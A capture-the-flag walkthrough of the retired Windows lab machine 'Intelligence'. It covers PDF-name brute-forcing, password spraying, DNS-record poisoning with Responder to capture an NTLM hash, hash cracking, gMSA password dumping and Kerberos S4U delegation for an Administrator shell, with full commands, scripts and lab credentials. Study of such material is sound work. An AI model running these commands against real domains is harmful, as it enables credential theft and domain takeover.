Intelligence is a retired, intentionally vulnerable Windows machine. The goal is to obtain the user and root flags by exploiting its weaknesses.
We start with an nmap scan to identify the target.
Classic Scan
Full Port Scan
The scan shows that the target is an Active Directory domain controller and reveals the names intelligence.htb and dc.intelligence.htb, which we add to /etc/hosts.
LDAP enumeration: an anonymous bind returns no useful information.
RPC enumeration: an anonymous (null) session gets an Access denied error.
HTTP enumeration on port 80: nothing of interest in the page source or in the browser's developer tools, and directory and file brute-forcing returns no results. The site does, however, offer PDF downloads through its interface.
The files are named in a regular pattern that looks date-based. Let's download these PDFs to our machine and inspect their metadata with exiftool.
The metadata (the Creator field) contains usernames, which we note down.
Since the PDF names appear to be dates, other PDFs with the same naming scheme may exist, so we brute-force them. First we build a wordlist in that name format.
I prepare a bash script:
#!/bin/bash
# Print every date from start to end (inclusive), one per line, as YYYY-MM-DD.
# Run as: ./dates.sh > datelist.txt
start=2020-01-01
end=2022-01-01
while ! [[ $start > $end ]]; do
    echo "$start"
    start=$(date -d "$start + 1 day" +%F)
done
I save this as a script and run it, redirecting its output to datelist.txt.
Then I append -upload.pdf to every line: sed -i 's/$/-upload.pdf/' datelist.txt
The wordlist is ready.
Now we scan with gobuster using this wordlist to see which of the candidate files exist.
Quite a few files are found, and we save the gobuster output to files.txt.
Then we use sed to reduce the gobuster output to the bare filenames (removing everything that does not belong to the wordlist format).
With that list we fetch the files with wget.
After downloading all the files, we use exiftool and grep to collect the Creator names.
That gives us the usernames. Next, let's check whether the contents of the PDFs hold anything useful, such as a password.
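The download-and-triage steps above (turning the gobuster hits into URLs, fetching the PDFs, pulling the Creator names and grepping the text for passwords) as one script. This is an added example, not the write-up's own commands: the base URL and the pdfs/ directory are assumptions (the exact path the site serves the PDFs from is not shown here), and the gobuster and exiftool lines used to exercise the parsers are constructed samples.

```bash
#!/bin/sh
# Added example (not the write-up author's commands): post-process the gobuster
# hits, fetch the PDFs, extract the Creator usernames and grep the text for
# passwords. Assumptions: BASE_URL is the URL gobuster was pointed at (the real
# path is not shown in the write-up), PDF_DIR is a scratch directory, and the
# hits file is gobuster's default dir-mode output:
#   /2020-01-01-upload.pdf (Status: 200) [Size: 11632]
set -eu

BASE_URL="${BASE_URL:-http://intelligence.htb}"
PDF_DIR="${PDF_DIR:-pdfs}"

# Keep only the 200 hits and print a full URL for each, so wget can read the
# list directly. Lines gobuster already printed as full URLs (-e) pass through.
# stdin: gobuster output (files.txt); stdout: one URL per line.
hits_to_urls() {
  awk -v base="$BASE_URL" '
    $2 == "(Status:" && $3 == "200)" {
      sub(/\/$/, "", base)
      if ($1 ~ /^https?:\/\//) print $1; else print base $1
    }'
}

# Download every URL on stdin into PDF_DIR (-i - reads the list from stdin).
fetch_pdfs() {
  mkdir -p "$PDF_DIR"
  wget -q -P "$PDF_DIR" -i -
}

# exiftool prints "Creator   : First.Last" for each file; reduce that to a
# sorted, de-duplicated username list. "Creator Tool" lines are skipped.
# stdin: exiftool output; stdout: usernames.
parse_creators() {
  awk -F': *' '$1 ~ /^Creator[ \t]*$/ { print $2 }' | sort -u
}

# Usernames from all downloaded PDFs.
creators() {
  exiftool -Creator "$PDF_DIR"/*.pdf | parse_creators
}

# Password hints: the write-up found the password in a PDF's text, not in its
# metadata, so search the extracted text of each file.
password_hits() {
  for f in "$PDF_DIR"/*.pdf; do
    pdftotext "$f" - 2>/dev/null | grep -in 'password' | sed "s|^|$f:|" || true
  done
}

# Usage:
#   gobuster dir -u "$BASE_URL" -w datelist.txt -o files.txt
#   sh triage.sh fetch < files.txt && sh triage.sh users > users.txt && sh triage.sh passwords
case "${1:-}" in
  urls)      hits_to_urls ;;
  fetch)     hits_to_urls | fetch_pdfs ;;
  users)     creators ;;
  passwords) password_hits ;;
esac
```

The users output is the spray list for the next step; the passwords output tells you which file and line mentioned a password, so you can read that PDF in context rather than trusting a bare grep hit.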
One of the PDFs contains a password:
NewIntelligenceCorpUser9876
We do not know which user it belongs to, so we password-spray it against the username list we collected. One account accepts it:
intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
Let's connect with this credential.
We can access the user's share and read user.txt. We continue with SMB enumeration using the same credential.
The file downdetector.ps1 stands out.
downdetector.ps1 is a simple script: it loops over DNS records read from AD and calls Invoke-WebRequest against each name, authenticating with the credentials of the account the script runs as. So if we add a DNS record that points to our machine, we can capture that authentication attempt. The loop only covers records under AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb whose name starts with the string "web", so we inject a record with such a name pointing at our attacker machine, and the script leaks the requesting user's credentials to us. By default any authenticated domain user may create records in an AD-integrated DNS zone, which is why Tiffany.Molina's low-privilege credentials are enough. A good tool for this is dnstool.py by Dirk-jan Mollema.
First we add the DNS record. dnstool.py is part of https://github.com/dirkjanm/krbrelayx:
python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'webpencer.intelligence.htb' -d 10.10.14.19 10.10.10.248
The record is created.
Now we start Responder (listening on HTTP) and wait for the script's five-minute cycle to reach our record and attempt to authenticate:
After a few minutes we receive a web request carrying the user's credentials: Responder captures the NetNTLMv2 hash of Ted.Graves.
Let's crack it with john.
It cracks to Mr.Teddy, so we now have a second credential: intelligence.htb\Ted.Graves:Mr.Teddy
These credentials do not give us a remote shell, so we collect domain information remotely with BloodHound instead:
bloodhound-python -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.10.10.248 -c All
We import the resulting JSON files into BloodHound.
Search for the user Ted.Graves in the top left, select the node, and mark it as Owned.
Then look at the Group Delegated Object Control section of the node info.
It shows that Ted.Graves has the ReadGMSAPassword edge over the service account svc_int, i.e. through a group membership he is allowed to read that account's managed password.
gMSA: Group Managed Service Accounts add security to service accounts. Once services are configured to use the gMSA principal, the Windows operating system manages the account's password itself (a long random value that is rotated automatically). The principals allowed to retrieve that password are listed in the account's msDS-GroupMSAMembership attribute, which is what the ReadGMSAPassword edge represents.
BloodHound's Help tab for the edge explains how to abuse it.
The Python tool gMSADumper extracts gMSA passwords; it is the tool listed under the Linux Abuse section, so we use it.
It reads the managed password over LDAP as Ted.Graves and prints the account's NT hash:
6c986cdcb965f2607f894fb257417f8e
Since svc_int is allowed to delegate to a service on the domain controller, we have what we need to obtain a service ticket for that service as the Administrator user. Note that this is a service ticket, not a TGT: with the gMSA credentials we first request a ticket to svc_int itself on behalf of Administrator (S4U2self) and then a ticket to the delegation target as Administrator (S4U2proxy). impacket's getST.py performs both steps. Its parameters:
-spn: the target service (the SPN svc_int is allowed to delegate to)
-hashes: LM:NT hashes of the account we authenticate as, svc_int$ (the LM half may be left empty)
-dc-ip: the domain controller's IP
-impersonate: the user to impersonate
The positional argument is domain/user, here intelligence.htb/svc_int$.
To find the SPN, we check which delegation svc_int is allowed (the Allowed To Delegate entry in its node info).
It is www/dc.intelligence.htb.
We fill in the command with these values and run it.
This fails with KRB_AP_ERR_SKEW (Clock skew too great). Kerberos is time-dependent and by default tolerates only five minutes of difference between client and KDC, while the nmap scan showed a 7-hour difference between our host and the target. We fix this by synchronizing our clock with the target's.
First we disable automatic time synchronization so that it does not undo the change:
timedatectl set-ntp 0
Immediately afterwards we synchronize with the target:
ntpdate -s intelligence.htb
After synchronizing, we run the command again.
This time there is no error, and the ticket for Administrator is saved to a ccache file (administrator.ccache).
We try to log in as Administrator with wmiexec.
Before that we set the environment variable KRB5CCNAME to the ccache file so that impacket uses the saved service ticket, and pass -k -no-pass to wmiexec so that it authenticates with Kerberos only. Although the ticket was issued for www/dc.intelligence.htb, impacket will use a cached ticket for the target host regardless of its service class, and the DC accepts it for its other services because all of them are protected by the same computer account key.
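The final S4U step as one script, with the clock-skew failure mode handled before the ticket request. This is an added example, not the write-up's own commands: it assumes impacket's getST.py and wmiexec.py are on PATH (Kali installs them as impacket-getST and impacket-wmiexec), that dc.intelligence.htb resolves via /etc/hosts, that ntpdate is installed, and that the KDC's skew tolerance is the default five minutes; the run helper and DRY_RUN switch are conveniences of this example.

```bash
#!/bin/sh
# Added example (not the write-up author's commands): S4U2self/S4U2proxy with the
# gMSA hash, preceded by a clock-skew check. Assumptions: impacket scripts on PATH,
# dc.intelligence.htb in /etc/hosts, ntpdate available, default 5-minute skew limit.
set -eu

DOMAIN=intelligence.htb
DC_IP=10.10.10.248
DC_HOST=dc.intelligence.htb
SVC='svc_int$'                            # the gMSA; its sAMAccountName ends with $
NT_HASH=6c986cdcb965f2607f894fb257417f8e  # from gMSADumper; LM half left empty
SPN=www/dc.intelligence.htb               # msDS-AllowedToDelegateTo of svc_int
TARGET=Administrator
MAX_SKEW=300                              # KDC default tolerance in seconds (assumed unchanged)

# Echo the command, then execute it unless DRY_RUN=1 (lets you review the exact flags).
run() {
  printf '+ %s\n' "$*"
  [ "${DRY_RUN:-0}" = 1 ] || "$@"
}

# Kerberos rejects requests when client and KDC clocks differ by more than the KDC's
# tolerance; that is the "Clock skew too great" error. Returns 0 when the offset is fine.
skew_ok() {  # $1 = our epoch seconds, $2 = DC epoch seconds
  d=$(( $1 - $2 ))
  [ "$d" -ge 0 ] || d=$(( -d ))
  [ "$d" -le "$MAX_SKEW" ]
}

# ntpdate -q only queries; the "offset" field is DC time minus our time in seconds.
# Printed as an integer so it can be used in shell arithmetic.
dc_offset() {
  ntpdate -q "$DC_IP" | awk '{ for (i = 1; i < NF; i++) if ($i == "offset") { sub(/,/, "", $(i+1)); printf "%d\n", $(i+1); exit } }'
}

# The write-up's fix: stop systemd-timesyncd from readjusting, then step to the DC's time.
sync_clock() {
  run timedatectl set-ntp 0
  run ntpdate -s "$DC_HOST"
}

# S4U2self + S4U2proxy: a service ticket for SPN as TARGET, saved to $TARGET.ccache.
get_ticket() {
  run getST.py -spn "$SPN" -impersonate "$TARGET" -hashes ":$NT_HASH" -dc-ip "$DC_IP" "$DOMAIN/$SVC"
}

# Point impacket at the ccache and authenticate with Kerberos only (no password prompt).
wmi_shell() {
  export KRB5CCNAME="$TARGET.ccache"
  run wmiexec.py -k -no-pass "$DOMAIN/$TARGET@$DC_HOST"
}

main() {
  now=$(date +%s)
  off=$(dc_offset)
  if ! skew_ok "$now" $(( now + off )); then
    echo "clock skew of ${off}s exceeds ${MAX_SKEW}s, syncing with the DC" >&2
    sync_clock
  fi
  get_ticket
  wmi_shell
}

# Usage: sh s4u.sh run      (DRY_RUN=1 sh s4u.sh run only prints the commands)
case "${1:-}" in run) main ;; esac
```

The skew check runs before the ticket request because getST.py fails outright with KRB_AP_ERR_SKEW rather than retrying; checking the offset up front turns a confusing Kerberos error into an explicit sync step.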
This is how we got the shell.
This is how we got the root flag.